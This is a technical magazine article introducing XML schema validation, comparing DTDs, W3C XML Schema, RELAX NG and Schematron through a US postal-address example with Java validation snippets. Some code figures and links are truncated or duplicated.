It’s late in the afternoon (or the wee hours of the morning, depending on your coding preference) and you want to stop for the day. But you can’t. The XML application you’re writing has developed a mysterious bug. All the regression tests pass, but when you run the application and have it try to process your boss’s XML document, the whole thing crashes. You’ve read the code a dozen times; you know it works. What’s wrong? The odds are good that your boss’s document contains invalid XML data, or is using XML elements and/or attributes in a way that you never anticipated. If you were using an XML schema when reading in the source document, you would have found this bug hours ago. Instead of crashing, your application would have notified you that it was given invalid XML data. In past articles we’ve examined the fundamentals of XML and taken an introductory look at programming with it. (See and.) In this article, we’ll turn our attention to XML Schema languages, which are used to define an XML schema for an application to use. There are several alternative schema languages competing for mind share at the moment. In this article, we’ll examine the four most common languages and look briefly at their features. We’ll also look at how you can use them in your applications today. What Is a Schema? A schema is nothing more than a set of constraints. These constraints can apply to both the content and attributes of an XML element (comments and processing instructions are ignored and inaccessible to most schema languages). Note that sometimes the term “schema” is used to mean an abstract set of constraints and sometimes it is used to mean a particular document that contains a schema in some specific language. This distinction is not often important, but it can lead to some confusion if you’re considering several alternative schema languages. Throughout this article, we’ll examine four schema languages: XML 1.0 DTDs, W3C XML Schema, RELAX NG, and Schematron. There are other languages, but these four are by far the most common. The most important benefit of a schema is that it allows you to test the validity of an XML document. An XML document is said to be valid with respect to a particular schema if it violates none of the constraints of that schema. What Is Validation? Validation is the process that answers the question: Does this particular document conform to this specific schema? The principal result of validation is an answer, either “yes” or “no.” As we’ll see later on, validation may also provide useful side-effects for an application. The specific tool for, or means of, performing validation on a document varies depending on the schema language that you are using. You should validate your XML documents because this will prevent errors and simplify subsequent processing. XML is structured data. Whenever you write an application or stylesheet that processes an XML document, it’s almost always going to be designed to handle only a certain class of documents. For example, if you write an application that is designed to print mailing labels from XML addresses, it probably isn’t going to do anything useful if you hand it an SVG (Scalable Vector Graphic) diagram or the text of Shakespeare’s Romeo and Juliet. If you were reading the addresses from an unstructured or binary format, you’d have to build error-checking into your application. But with XML, you can use validation to greatly simplify your task. By passing the input document through a validator, you can determine beforehand if it’s going to have the structure you expect (and reject it outright if it doesn’t). By the same token, you can write your applications to accept all of the possible valid structures because they are identified by the schema. As soon as you start working with XML vocabularies that are a little bit unfamiliar, or vocabularies that have more elements than you can remember off the top of your head, you’re bound to run into some trouble if you don’t validate. Even for small documents, there’s no substitute for validation. It can be extremely frustrating to stare at a document a dozen times or more before realizing that you’ve used <lastname> instead of <surname> and that you’d not turned on validation. Validation would have revealed the error in seconds. What Can You Validate? Validation can check two different kinds of constraints — constraints on simple types and those on complex types. The specific nature of the constraints that a given schema language can express is the principal feature that distinguishes the languages from one another. SImple Types: Simple types are atomic strings that occur in a document. They are often attribute values, but some schema languages allow you to define element content in terms of simple types. Strings, numbers, positive integers, and dates are all examples of simple types. In order for a string to satisfy the constraints of a simple type, it must first be a simple string of characters (meaning that it can’t contain any elements). Secondly, it must be in the “lexical space” of the type that it is being tested against. This is just a fancy way of saying that it must “look like” a value of the right type. So, this means that an integer must contain only decimal digits, possibly with a leading sign character; if it’s a date, it must look like an ISO 8601 date, and so on. Complex Types: Complex types can be a little harder to understand. A complex type is an arrangement of elements, attributes, and possibly text. Complex types represent things like postal addresses, chapters of a book, and purchase orders (anything with sub-element structure). Types of Constraints There are two kinds of constraints that you can place on an element; you can limit the number and name of its attributes and you can constrain if, where, and how many times it occurs with respect to other elements. An element satisfies the constraints on its attributes if it satisfies the following conditions: Constraining where an element occurs is the role of the content model. Every element that allows sub-element structure has a content model associated with it. This content model describes what elements may occur directly inside it and in what order they may occur. A complex type can therefore be seen as the combination of a content model and a set of attribute constraints. For example, a U.S. postal address might be constrained to contain only street, city, state, and ZIP elements, or a chapter in a book might be constrained to contain exactly one title followed by paragraphs. Understanding Content Models Content models are a little bit like regular expressions, although they are nowhere near as flexible. In constructing a content model, you have four tools at your disposal: sequences, choices, repetition, and grouping. Sequences: A sequence specifies that several elements must occur one after another. For example, a U.S. postal address must contain a city, followed by a state, followed by a ZIP code. Choices: A choice specifies that any one of a number of elements can occur. For example, a chapter might be allowed to consist of paragraphs, tables, and figures. Repetition: Repetition allows you to express that an element may be repeated. For example, an address might allow one or more street elements. All of the schema languages allow you to specify that an element may appear exactly once, at most once (optionality), one or more times, and zero or more times. Some languages provide even finer control. Grouping: Grouping allows you to associate repetition with an entire sequence or choice. For example, a chapter might allow the choice of paragraph, table, or figure to be repeated any number of times. This effectively allows any combination of paragraphs, tables, and figures to occur. Side-Effects In addition to returning a Boolean result for the question; “Is this document valid?”, schema processors may provide additional information for an application. In the case of W3C XML Schema, a sophisticated Post Schema Validation Infoset is described, while other languages define the results more simply (or not at all). There are two ways of looking at these side effects: On the one hand, they allow the schema processor to provide additional, useful information to applications. This means that applications using schema-validated documents don’t have to recalculate values that the schema processor must have calculated in order to check the validity of the document. Suppose, for example, that your schema identifies the type of an attribute value as a duration of less than 100 years. In order for the schema processor to determine if your document is valid, it will have to: That’s quite a bit of work, and the schema validator has to do it to determine validity, regardless of whatever subsequent processing might be performed. Providing a mechanism for the validator to pass the typed information on to the application frees the application author from the burden of reprocessing the attribute string in order to extract the duration for its purposes. This improves efficiency and avoids one class of application errors. On the other hand, these side effects perform a subtle sort of transformation. They can make the same document appear different depending on whether or not schema processing was performed. In the simple case of DTD validation, for example, a non-validating parser may not provide default attribute values that were specified in the DTD schema. This means that an application such as a stylesheet may behave quite differently depending on exactly what kind of parser was used. Because developers are often not aware that they are actually able to make choices about the kind of processors used, these side-effects can sometimes result in rather confusing errors. Type Information As we just described, one of the most useful features of a schema validator is that it provides datatype information. When looking at a validated document, your application might expect that an attribute declared as an integer would be identified specifically as an integer. There are existing applications, such as XSLT processors, that rely on this extra information for some of their features. XSLT stands for “XSL Transformations,” where XSL itself stands for “Extensible Stylesheet Language.” XSLT is the standard method for transforming XML into HTML or plain text (we’ll be looking at XSLT processors in a future article). In order for the XSLT id() function to find ID values, the document must have been validated with a parser that provides information about which attribute values are in fact of type “ID.” Default Values Another side effect that validators can provide is the ability to set default values for attribute or element content. For example, if an address does not specify a country, the country “US” can be provided automatically. The value of a default attribute is literally provided by the validator. From the point of view of any subsequent processing, the value will be present, and it may not even be possible to tell whether it was included within the original document or provided by the validator. Some validators also provide the ability to specify “fixed values” for attributes or element content. A fixed value is like a default in that it will be provided if it is absent, but if it is present, it must match the fixed value or values specified in the schema. It must be noted that supplying default values is not, strictly speaking, part of validation. In fact, in XML 1.0, even non-validating parsers are required to provide default attribute values if they encounter declarations for them. Some schema languages, such as RELAX NG, go so far as to specify defaulting behavior, which is entirely separate from validation. Programming with Schemas Unfortunately, a comprehensive explanation of any one of the common schema languages would require far more space than is available in a single magazine article. So instead, we’ll look at each of them briefly and then attempt to point out some of their distinguishing features. Be sure to take a look at Resources (pg. 33) for more specific information, particularly the report of the Schema Languages Comparison Town Hall Meeting from the XML 2001 conference. Continuing with the postal address example, let’s look at a (simple) schema for validating US postal addresses. Figure One shows what an acceptable element might look like. Figure One: Validating U.S. Postal Addresses <address> <name>John Smith</name> <street>123 Any Street</street> <city>Anytown</city> <state>MA</state> <zip>01004</zip> </address> A postal address might be described this way: an optional name, a post office box or up to three lines of street address, a city, state, and a ZIP code. Because this format will only work for postal addresses located in the United States, we’ll add a fixed attribute to the address that will indicate this. Finally, we’ll allow an optional ID attribute on addresses too, so that we can give addresses unique identifiers for locating them easily in our documents. Choosing a schema language and writing the schema is most of the battle, but before we’re finished, we have to actually use the schema to perform validation. There are lots of ways this can be accomplished, and exactly which mechanism you choose will depend on your needs and your programming environment. There are standard XML parsing modules for most common languages, including C/C++, Perl, Python, and Tcl. The examples we’ll explore here are in Java using toolkits from Apache and Sun Microsystems. In the interest of space, we’ll only present the definition of the address elements and small fragments of the source code for our validation examples. You can get the complete text of each of the schemas and the full source code online at. com/downloads/xml_schema.tar.gz. DTD Validation Historically, DTDs (Document Type Definitions) were inherited from SGML, and they are the only form of schema described by the XML 1.0 Recommendation. The principal advantage of DTDs is that they are supported by every validating XML 1.0 parser. Also, they have well understood and agreed upon semantics, and they are compact. Unfortunately, for many modern applications, their advantages are outweighed by their disadvantages, some of which are listed below: The declaration for an address in a DTD appears in Figure Two. Figure Two: An Address in XML 1.0 DTD <!ELEMENT address (name?, (pobox|street+), city, state, zip)> <!ATTLIST address idID #IMPLIED country CDATA #FIXED “US” > DTDs use a simple string-based syntax to express content models. The comma separator is used to identify a sequence, vertical bars to identify a choice. Grouping is provided by parentheses. The postfix operators “?“, “+“, and “*” identify repetition. They indicate optionality, one or more times and zero or more times, respectively. A name (or group) with no repetition operator must appear exactly once. DTDs provide a few mechanisms for constraining simple types in attribute values, but they provide no mechanisms for such constraints in element content. There is no way to express that the content of the state element must be a valid U.S. state abbreviation or that the ZIP code must contain an integer, let alone an integer in a specific range. (Using integers to constrain the ZIP code is a bit of a hack but it provides a simple example; in real life, a regular expression or some other mechanism would be preferable.) Attributes are declared separately. They are composed of a name, a type (there are only a handful of types in XML DTDs), and either a default value or a keyword that indicates if they are optional (#IMPLIED), required (#REQUIRED), or fixed (#FIXED). Validating with DTDs is easy. Any validating XML 1.0 parser will, by definition, perform DTD validation. (For more information on parsing XML, please refer to our October 2001 article located at or the Resources sidebar.) Figure Three illustrates an example of constructing a validating SAX parser using JAXP. Figure Three: Validating with XML 1.0 DTDs SAXParserFactory factory = null; SAXParser parser = null; factory = SAXParserFactory.newInstance(); factory.setValidating(true); // Enable validation parser = factory.newSAXParser(); factory = SAXParserFactory.newInstance(); factory.setValidating(true); // Enable validation parser = factory.newSAXParser(); Any documents that are parsed with this parser will be validated according to the DTD they specify. One unique feature of DTDs is that they must be referenced by the document to be validated. The document type declaration (the line that begins <!DOCTYPE …) at the beginning of an XML document identifies the DTD that applies to that document. If the document type declaration is missing, there is no standard mechanism for selecting an alternate DTD to use for validation. W3C XML Schema Validation The next generation of schema validation from the W3C is XML Schemas. Unlike DTDs, XML Schemas are written using XML elements and attributes instead of a special notation. XML Schemas offer a rich library of built-in datatypes and a type hierarchy that separates type definition from element declaration and allows element types to be derived by restriction or extension. In other words, you can derive an international address type by extending the definition of some base address type, or you can derive an age datatype from integer by restricting it to values strictly greater than 0 and less than 100. The type definition for an address in a W3C XML Schema appears in Figure Four. Figure Four: An Address in W3C Schema <xs:complexType name=’Address’> <xs:sequence> <xs:element ref=’name’/> <xs:choice> <xs:element ref=’poBox’/> <xs:element ref=’street’ minOccurs=’1′ maxOccurs=’3′/> </xs:choice> <xs:element name=’city’ type=’xs:string’/> <xs:element name=’state’ type=’StateAbbrev’/> <xs:element name=’zip’ type=’ZipCode’/> </xs:sequence> <xs:attribute name=”id” type=”xs:ID”/> <xs:attribute name=”country” type=”xs:string” fixed=”US”/> </xs:complexType> W3C XML Schemas allow for the separation of types from element declarations. In this example, we show the address type (the xs:complexType) and the element declaration (the xs:element) that associates the address element with this type. Separation of type and declaration allows multiple elements to be easily constructed from the same type. The content model is expressed using the elements xs:sequence and xs:choice; these elements provide grouping automatically. Repetition is handled by the minOccurs and maxOccurs attributes. Note that existing W3C XML Schemas allow for arbitrary repetitions. Many of the elements and attributes here are declared in terms of built-in datatypes, but state and zip are defined in terms of user-defined types. This allows the schema to constrain their values to the U.S. states and reasonable ZIP codes. (The definitions of the user-defined types StateAbbrev and ZipCode are not shown here, but they are fully defined in the address schema that is available for download). The xs:attribute element declares attributes. They have a name, a type (which may be drawn from the full palette of built-in XML Schema datatypes), and may be specified as being either optional, required, or fixed. Support for W3C XML Schemas is starting to show up in parser libraries. Recent releases of the popular Xerces parser from Apache, for example, now include W3C XML Schema validation. The example in Figure Four is based on the XercesJ 1.4.3 APIs. (For more information on Xerces, check out the Apache Project’s XML pages. You’ll find the URL in Resources). In Figure Five, we begin by establishing a SAX Parser factory, just as we did for DTD validation. Note, however, that we explicitly enable namespace awareness; this is necessary for W3C XML Schema validation with Xerces. Because Xerces also uses schema validation through features on the XML Reader imple-mentation, we must set this after getting the XML Reader. Figure Five: Validating with W3C XML Schemas SAXParserFactory factory = null; SAXParser parser = null;); } Normally, the document will use the schema location hints to identify which schema should be used. However, W3C XML Schemas allow us to force the document to be processed with an arbitrary schema regardless of any hints that might be in the document. The “no namespace” schema is selected because this address won’t be located in any namespace. If you’re using namespaces, you want to make sure that you set the http:// apache.org/xml/properties/schema/external-schemaLocation property or properties (if you have more than one namespace) appropriately. For more information on XML Namespaces, please refer again to our July 2001 article on XML, located at http://. OASIS RELAX NG Schema Validation The RELAX NG specification is the work of the OASIS RELAX NG Technical Committee. OASIS, the Organization for the Advancement of Structured Information Standards, is an international, not-for-profit consortium that designs and develops industry standard specifications for interoperability based on XML. This work represents the unification of two other schema languages, TREX and RELAX. RELAX NG is built on a strong theoretical foundation and provides a number of features not available elsewhere, including co-constraints and the ability to use not only the W3C XML Schema datatypes, but also alternate datatype libraries. RELAX NG offers little support for validation side-effects. In fact, ID identification is provided by an ancillary specification; features such as fixed attribute values and fixed or defaulted element content are not provided. The declarations for an address in a RELAX NG schema appears in Figure Six . Figure Six: An Address in RELAX NG <element name=”address”> <optional> <attribute name=”country” a:defaultValue=”US”> <choice> <value>US</value> </choice> </attribute> </optional> <optional> <attribute name=”id”> <data type=”ID”/> </attribute> </optional> <group> <optional> <ref name=”Name”/> </optional> <choice> <ref name=”POBox”/> <oneOrMore> <ref name=”Street”/> </oneOrMore> </choice> </group> <element name=”city”><text/></element> <element name=”state”> <ref name=”StateAbbrev”/> </element> <element name=”zip”> <ref name=”ZipCode”/> </element> </element> Within the model for RELAX NG Schemas, elements form a sequence unless they are contained in a choice. A group element allows for grouping. Additionally, there are elements that allow the schema to express repetition: oneOrMore, optional, and zeroOrMore. Elements can be declared “in place” by using element. Alternatively, you can use ref to reference them to other elements. RELAX NG Schemas can define components that may be reused. Here, StateAbbrev and ZipCode components constrain the content of state and zip, respectively. Attribute declarations and element declarations in RELAX NG are treated uniformly. The same elements used to declare element content are used to declare attribute content and optionality. The ability to specify default values for attributes is provided by a separate annotation specification, shown in use here with the a:defaultValue annotation. Because there is no direct equivalent of fixed values in RELAX NG, this schema achieves that behavior by specifying that the allowed content of the country attribute is a choice with a single possible value. Figure Seven shows an example of validating with RELAX NG. In this case, Sun’s Multi-Schema XML Validator (MSV) is being used. MSV has a slightly different factory setup than the SAX Parser. Figure Seven: Validating with RELAX NG String schemaURI = ““; VerifierFactory factory = VerifierFactory.newInstance(schemaURI); Verifier verifier = factory.newVerifier(schema); if (verifier.verify(xmlfile)) { System.out.println(“Document is valid, full speed ahead!”); } else { System.out.println(“Document is not valid according to ” + schema); } Verifier verifier = factory.newVerifier(schema); if (verifier.verify(xmlfile)) { System.out.println(“Document is valid, full speed ahead!”); } else { System.out.println(“Document is not valid according to ” + schema); } As its name implies, MSV can validate using several different schema languages. The schemaURI is used to determine which type of verifier to construct. In the full source for this program, you’ll see that there’s a command-line switch to select either RELAX NG or W3C XML Schema validation. After constructing a factory for the validator (or verifier) we want, we must then build a verifier for the particular schema that we’re using. The schema variable contains the URI of the file containing the schema we wish to use for validation. Schematron Validation Schematron, developed principally by Rick Jelliffe at the Academia Sinica Computing Center, takes an entirely different approach to validation. Unlike the other schemas we have looked at, Schematron is not based on the declaration of a grammar that must be matched, nor does it have a content model like the other schema languages. Instead, it relies on the validation of “tree patterns.” As a result, a Schematron system does not have the ability to provide validation side-effects. This technique provides tremendous new power; you could, for example, design a Schematron schema that required every city name to be two words or have an odd number of letters. In short, you can assert that any expression be true in any given context. Using Schematron is sometimes a bit awkward, but there are many constraints that can’t be expressed easily, or even at all, in a grammar-based schema. One area of growing interest is the combination of Schematron with other validation strategies, effectively combining the best of both worlds. The declarations for an address in a Schematron schema are in Figure Eight. Figure Eight: An Address in Schematron <pattern name=”Valid Address”> <rule context=”address”> <assert test=”count(name) < 2″>Must have at most one name</assert> <assert test=”count(pobox) != 0 or count(street) != 0″>Must have pobox or street</assert> <assert test=”count(pobox) = 0 or count(street) = 0″>Must have only one of pobox or street</assert> <assert test=”count(pobox) < 2″>Must have at most one pobox</assert> <assert test=”count(street) <= 3″>May have at most three lines of street </assert> <assert test=”count(city)=1″>Must have exactly one city</assert> <assert test=”count(state)=1″>Must have exactly one state</assert> <assert test=”count(zip)=1″>Must have exactly one zip</assert> <assert test=”not(@country) or @country=’US’”>Country must be US</assert> </rule> </pattern> In this schema, we express our constraints literally using Xpath expressions. XPath, the XML Path Language, will be described in greater detail in our future article on XSL Transformations. In the example above, we test for an optional name element by asserting that the number of name elements is less than two (i.e., zero or one, since the number of elements that are present cannot possibly be negative). Attribute and element constraints are handled simply by using the appropriate expressions. Note that these XPath expressions occur within the context of an XML document, so the markup characters that are significant to XML must be escaped. That’s why we use “<” instead of “<” in our expressions. Schematron is very different from the other schema languages. Instead of being a grammar-based language like the others, it’s a rule-based language. It turns out that XSLT, which we’ve mentioned before, is a convenient language for expressing these rules. If you aren’t at all familiar with XSLT, that’s perfectly okay. You can use Schematron without a complete understanding of XSL Transformations; its validation tools can write all the XSLT stylesheets you’ll need. The first step in performing Schematron validation is to convert your Schematron schema into an XSLT stylesheet (using an XSLT stylesheet provided in the Schematron implementation). Figure Nine shows a small part of the Schematron XSLT stylesheet for addresses. Only the tests for the first two assertions are shown. Figure Nine: Validating with Schematron <axsl:template match=”address” priority=”4000″ mode=”M1″> <axsl:choose> <axsl:when test=”count(name) < 2″/> <axsl:otherwise>In pattern count(name) < 2: Must have one name </axsl:otherwise> </axsl:choose> <axsl:choose> <axsl:when test=”count(pobox) != 0 or count(street) != 0″/> <axsl:otherwise>In pattern count(pobox) != 0 or count(street) != 0: Must have pobox or street </axsl:otherwise> The next step is to process your source document with the XSLT stylesheet derived from your Schematron schema. If there are assertions that fail, the stylesheet will produce messages to that effect. Using a Schematron stylesheet directly in your application would then require processing the documents with an XSLT Processor (such as the Apache Project’s Xalan) and examining the results. Choosing a Tool In this article, we’ve examined the role and benefits of validation as well as a number of specific validation tools that you can use in your various XML projects. Which specific tool you elect to use will depend on many factors, but hopefully you’ve seen that validation of some form is always a good idea. Resources
http://www.linux-mag.com/id/971/
CC-MAIN-2017-22
refinedweb
4,788
53.41
In the previous post we looked at getting your new bot off the ground with the SuperScript package. Today, we'll take this a step further and write your own personal assistant to find music videos, complete with its own voice using IVONA's text-to-speech platform. Giving your bot a voice To get started with IVONA, visit here and go to Speech Cloud > Sign Up. After a quick sign-up process, you'll be pointed to your dashboard, where you'll be able to get the API key needed to use their services. Go ahead and do so, and ensure you download the key file, as we'll need it later. We'll need to add a couple more packages to your SuperScript bot to integrate IVONA into it, so run the following: npm install --save ivona-node npm install --save play-sound ivona-node is a library for easily interfacing with the IVONA API without having to set things like custom headers yourself, while play-sound will let you play sound directly from your terminal, so you can hear what your bot says without having to locate the mp3 file and play it yourself! Now we need to write some code to get these two things working together. Open up src/server.js in your SuperScript directory, and at the top, add: import Ivona from 'ivona-node'; import Player from 'play-sound'; import fs from 'fs'; We'll need fs to be able to write the voice files to our system. Now, find your IVONA access and secret keys, and set up a new IVONA instance by adding the following: const ivona = new Ivona({ accessKey: 'YOUR_ACCESS_KEY', secretKey: 'YOUR_SECRET_KEY', }); We also need to create an instance of the player: const player = Player(); Great! We can double-check that we can access the IVONA servers by asking for a full list of voices that IVONA provides. ivona.listVoices() .on('complete', (voices) => { console.log(voices); }); These are available to sample on the IVONA home page, so if you haven't already, go and check it out. And find one you like! Now it's time for the magic to happen. Inside the bot.reply callback, we need to ask IVONA to turn our bot response into a speech before outputting it in our terminal. We can do that in just a few lines: bot.reply(..., (err, reply) => { // ... Other code to output text to the terminal // const stream = fs.createWriteStream('text.mp3'); ivona.createVoice(reply.string, { body: { voice: { name: 'Justin', language: 'en-US', gender: 'Male', }, }, }).pipe(stream); stream.on('finish', () => { player.play('text.mp3', (err) => { if (err) { console.error(err); } }); }); }); Run your bot again by running npm run start, and watch the magic unfurl as your bot speaks to you! Getting your bot to do your bidding Now that your bot has a human-like voice, it's time to get it to do something useful for you. After all, you are its master. We're going to write a simple script to find music videos for you. So let's open up chat/main.ss and add an additional trigger: + find a music video for (*) by (*) - Okay, here's your music video for <cap1> by <cap2>. ^findMusicVideo(<cap1>, <cap2>) Here, whenever we ask the bot for a music video, we just go off to our function findMusicVideo that finds a relevant video on YouTube. We'll write that SuperScript plugin now. First, we'll need to install the request library to make HTTP requests to YouTube. npm install --save request You'll also need to get a Google API key to search YouTube and get back some results in JSON form. To do this, you can go to here and follow the instructions to get a new key for the 'YouTube Data API'. Then, inside plugins/musicVideo.js, we can write: import request from 'request'; const YOUTUBE_API_BASE = ''; const GOOGLE_API_KEY = 'YOUR_KEY_HERE'; const findMusicVideo = function findMusicVideo(song, artist, callback) { request({ url: YOUTUBE_API_BASE, qs: { part: 'snippet', key: GOOGLE_API_KEY, q: `${song} ${artist}`, }, }, (error, response, body) => { if (!error && response.statusCode === 200) { try { const parsedJSON = JSON.parse(body); if (parsedJSON.items[0]) { return callback(`{parsedJSON.items[0].id.videoId}`); } } catch (err) { console.error(err); } return callback(''); } return callback(''); }); }; All we're doing here is making a request to the YouTube API for the relevant song and artist. We then take the first one that YouTube found, and stick it in a nice link to give back to the user. Now, parse and run your bot again, and you'll see that not only does your bot talk to you with a voice, but now you can ask it to find a YouTube video for you. About the author Ben is currently the technical director at To Play For, creating games, interactive stories and narratives using artificial intelligence. Follow him at @ToPlayFor.
https://www.packtpub.com/books/content/adding-life-your-chatbot
CC-MAIN-2017-13
refinedweb
805
71.04
21 March 2007 17:27 [Source: ICIS news] LONDON (ICIS news)--BASF is beginning to unleash its considerable potential in biotechnology. The company has developed a range of techniques, including metabolic profiling, or metabolomics, and high throughput screening in its Plant Science business that is obviously attractive. The venture announced on Wednesday with gene science leader Monsanto reflects this. Pumping a cool $1.5bn (€1.1bn) into yield and stress tolerance traits for corn, soybeans, cotton and canola – or oil seed rape – jointly with Monsanto signals a great deal. BASF is building on its platform of innovation to look harder at raw material change – how alternative raw materials might be used to make chemicals and biotechnology applied to nutrition, health and more efficient agriculture. Its metabalomics research particularly delves into which genes express which chemicals in plant cellular activity. The chemicals giant has applied expertise in analytics, robotics and complex laboratory information systems to plant science to make a difference. It has taken a different route to most players in the agricultural biotechnology business but clearly now needs a partner to deliver products that will help grow more food and plant-based feedstock more effectively. Yield and stress is the focus of the deal with Monsanto – a 50:50 research venture through which both companies expect to accelerate product pipeline development. Monsanto has been keen to tap into a new approach in its core business, principally developed by the BASF company Metanomics. It sees significant potential to accelerate product throughput giving farmers access to new traits. BASF has described the plant biotechnology systems it has developed since it set up a plant science business in 1998 as a Google dedicated to genetics. The systems can rapidly sort genes for further R&D work, with Metanomics delving into the workings of individual plant ‘factories’. The search for enhanced yield and stress tolerant traits is one of the most important in agriculture. More meat is being consumed in ?xml:namespace> Yield is the Holy Grail of agricultural research and the partners in this deal say they expect to produce a family of products over the next decade delivering yield increases of more than 20%. This venture is not simply about research Monsanto and BASF stress. Monsanto expects the net present value of its yield and stress product platform to double through the link-up. BASF will benefit from more effectively monetising its plant science research and speeding the delivery of products to market from its early stage research. New products from the venture will be sold through the Monsanto network with the proceeds split 60:40. Monsanto is clearly delighted with the deal. “We’ve just connected a fire hose to our product pipeline,” one senior executive said on Thursday. BASF is on the way to delivering considerably more through its network of chemical and biotechnology expertise. (
http://www.icis.com/Articles/2007/03/21/9015244/insight-basf-finds-smart-route-for-plant-science.html
CC-MAIN-2014-42
refinedweb
475
51.89
Learning to Play Pong¶ In this example, we’ll train a very simple neural network to play Pong using the OpenAI Gym. At a high level, we will use multiple Ray actors to obtain simulation rollouts and calculate gradient simultaneously. We will then centralize these gradients and update the neural network. The updated neural network will then be passed back to each Ray actor for more gradient calculation. This application is adapted, with minimal modifications, from Andrej Karpathy’s source code (see the accompanying blog post). To run the application, first install some dependencies. pip install gym[atari] At the moment, on a large machine with 64 physical cores, computing an update with a batch of size 1 takes about 1 second, a batch of size 10 takes about 2.5 seconds. A batch of size 60 takes about 3 seconds. On a cluster with 11 nodes, each with 18 physical cores, a batch of size 300 takes about 10 seconds. If the numbers you see differ from these by much, take a look at the Troubleshooting section at the bottom of this page and consider submitting an issue. Note that these times depend on how long the rollouts take, which in turn depends on how well the policy is doing. For example, a really bad policy will lose very quickly. As the policy learns, we should expect these numbers to increase. import numpy as np import os import ray import time import gym Hyperparameters¶ Here we’ll define a couple of the hyperparameters that are used. H = 200 # The number of hidden layer neurons. gamma = 0.99 # The discount factor for reward. decay_rate = 0.99 # The decay factor for RMSProp leaky sum of grad^2. D = 80 * 80 # The input dimensionality: 80x80 grid. learning_rate = 1e-4 # Magnitude of the update. Helper Functions¶ We first define a few helper functions: 1. Preprocessing: The preprocess function will preprocess the original 210x160x3 uint8 frame into a one-dimensional 6400 float vector. 2. Reward Processing: The process_rewards function will calculate a discounted reward. This formula states that the “value” of a sampled action is the weighted sum of all rewards afterwards, but later rewards are exponentially less important. 3. Rollout: The rollout function plays an entire game of Pong (until either the computer or the RL agent loses). def preprocess(img): # Crop the image. img = img[35:195] # Downsample by factor of 2. img = img[::2, ::2, 0] # Erase background (background type 1). img[img == 144] = 0 # Erase background (background type 2). img[img == 109] = 0 # Set everything else (paddles, ball) to 1. img[img != 0] = 1 return img.astype(np.float).ravel() def process_rewards(r): """Compute discounted reward from a vector of rewards.""" discounted_r = np.zeros_like(r) running_add = 0 for t in reversed(range(0, r.size)): # Reset the sum, since this was a game boundary (pong specific!). if r[t] != 0: running_add = 0 running_add = running_add * gamma + r[t] discounted_r[t] = running_add return discounted_r def rollout(model, env): """Evaluates env and model until the env returns "Done". Returns: xs: A list of observations hs: A list of model hidden states per observation dlogps: A list of gradients drs: A list of rewards. """ # Reset the game. observation = env.reset() # Note that prev_x is used in computing the difference frame. prev_x = None xs, hs, dlogps, drs = [], [], [], [] done = False while not done: cur_x = preprocess(observation) x = cur_x - prev_x if prev_x is not None else np.zeros(D) prev_x = cur_x aprob, h = model.policy_forward(x) # Sample an action. action = 2 if np.random.uniform() < aprob else 3 # The observation. xs.append(x) # The hidden state. hs.append(h) y = 1 if action == 2 else 0 # A "fake label". # The gradient that encourages the action that was taken to be # taken (see if # confused). dlogps.append(y - aprob) observation, reward, done, info = env.step(action) # Record reward (has to be done after we call step() to get reward # for previous action). drs.append(reward) return xs, hs, dlogps, drs Neural Network¶ Here, a neural network is used to define a “policy” for playing Pong (that is, a function that chooses an action given a state). To implement a neural network in NumPy, we need to provide helper functions for calculating updates and computing the output of the neural network given an input, which in our case is an observation. class Model(object): """This class holds the neural network weights.""" def __init__(self): self.weights = {} self.weights["W1"] = np.random.randn(H, D) / np.sqrt(D) self.weights["W2"] = np.random.randn(H) / np.sqrt(H) def policy_forward(self, x): h = np.dot(self.weights["W1"], x) h[h < 0] = 0 # ReLU nonlinearity. logp = np.dot(self.weights["W2"], h) # Softmax p = 1.0 / (1.0 + np.exp(-logp)) # Return probability of taking action 2, and hidden state. return p, h def policy_backward(self, eph, epx, epdlogp): """Backward pass to calculate gradients. Arguments: eph: Array of intermediate hidden states. epx: Array of experiences (observations. epdlogp: Array of logps (output of last layer before softmax/ """ dW2 = np.dot(eph.T, epdlogp).ravel() dh = np.outer(epdlogp, self.weights["W2"]) # Backprop relu. dh[eph <= 0] = 0 dW1 = np.dot(dh.T, epx) return {"W1": dW1, "W2": dW2} def update(self, grad_buffer, rmsprop_cache, lr, decay): """Applies the gradients to the model parameters with RMSProp.""" for k, v in self.weights.items(): g = grad_buffer[k] rmsprop_cache[k] = (decay * rmsprop_cache[k] + (1 - decay) * g**2) self.weights[k] += lr * g / (np.sqrt(rmsprop_cache[k]) + 1e-5) def zero_grads(grad_buffer): """Reset the batch gradient buffer.""" for k, v in grad_buffer.items(): grad_buffer[k] = np.zeros_like(v) Parallelizing Gradients¶ We define an actor, which is responsible for taking a model and an env and performing a rollout + computing a gradient update. ray.init() @ray.remote class RolloutWorker(object): def __init__(self): # Tell numpy to only use one core. If we don't do this, each actor may # try to use all of the cores and the resulting contention may result # in no speedup over the serial version. Note that if numpy is using # OpenBLAS, then you need to set OPENBLAS_NUM_THREADS=1, and you # probably need to do it from the command line (so it happens before # numpy is imported). os.environ["MKL_NUM_THREADS"] = "1" self.env = gym.make("Pong-v0") def compute_gradient(self, model): # Compute a simulation episode. xs, hs, dlogps, drs = rollout(model, self.env) reward_sum = sum(drs) # Vectorize the arrays. epx = np.vstack(xs) eph = np.vstack(hs) epdlogp = np.vstack(dlogps) epr = np.vstack(drs) # Compute the discounted reward backward through time. discounted_epr = process_rewards(epr) # Standardize the rewards to be unit normal (helps control the gradient # estimator variance). discounted_epr -= np.mean(discounted_epr) discounted_epr /= np.std(discounted_epr) # Modulate the gradient with advantage (the policy gradient magic # happens right here). epdlogp *= discounted_epr return model.policy_backward(eph, epx, epdlogp), reward_sum Running¶ This example is easy to parallelize because the network can play ten games in parallel and no information needs to be shared between the games. In the loop, the network repeatedly plays games of Pong and records a gradient from each game. Every ten games, the gradients are combined together and used to update the network. iterations = 20 batch_size = 4 model = Model() actors = [RolloutWorker.remote() for _ in range(batch_size)] running_reward = None # "Xavier" initialization. # Update buffers that add up gradients over a batch. grad_buffer = {k: np.zeros_like(v) for k, v in model.weights.items()} # Update the rmsprop memory. rmsprop_cache = {k: np.zeros_like(v) for k, v in model.weights.items()} for i in range(1, 1 + iterations): model_id = ray.put(model) gradient_ids = [] # Launch tasks to compute gradients from multiple rollouts in parallel. start_time = time.time() gradient_ids = [ actor.compute_gradient.remote(model_id) for actor in actors ] for batch in range(batch_size): [grad_id], gradient_ids = ray.wait(gradient_ids) grad, reward_sum = ray.get(grad_id) # Accumulate the gradient over batch. for k in model.weights: grad_buffer[k] += grad[k] running_reward = (reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01) end_time = time.time() print("Batch {} computed {} 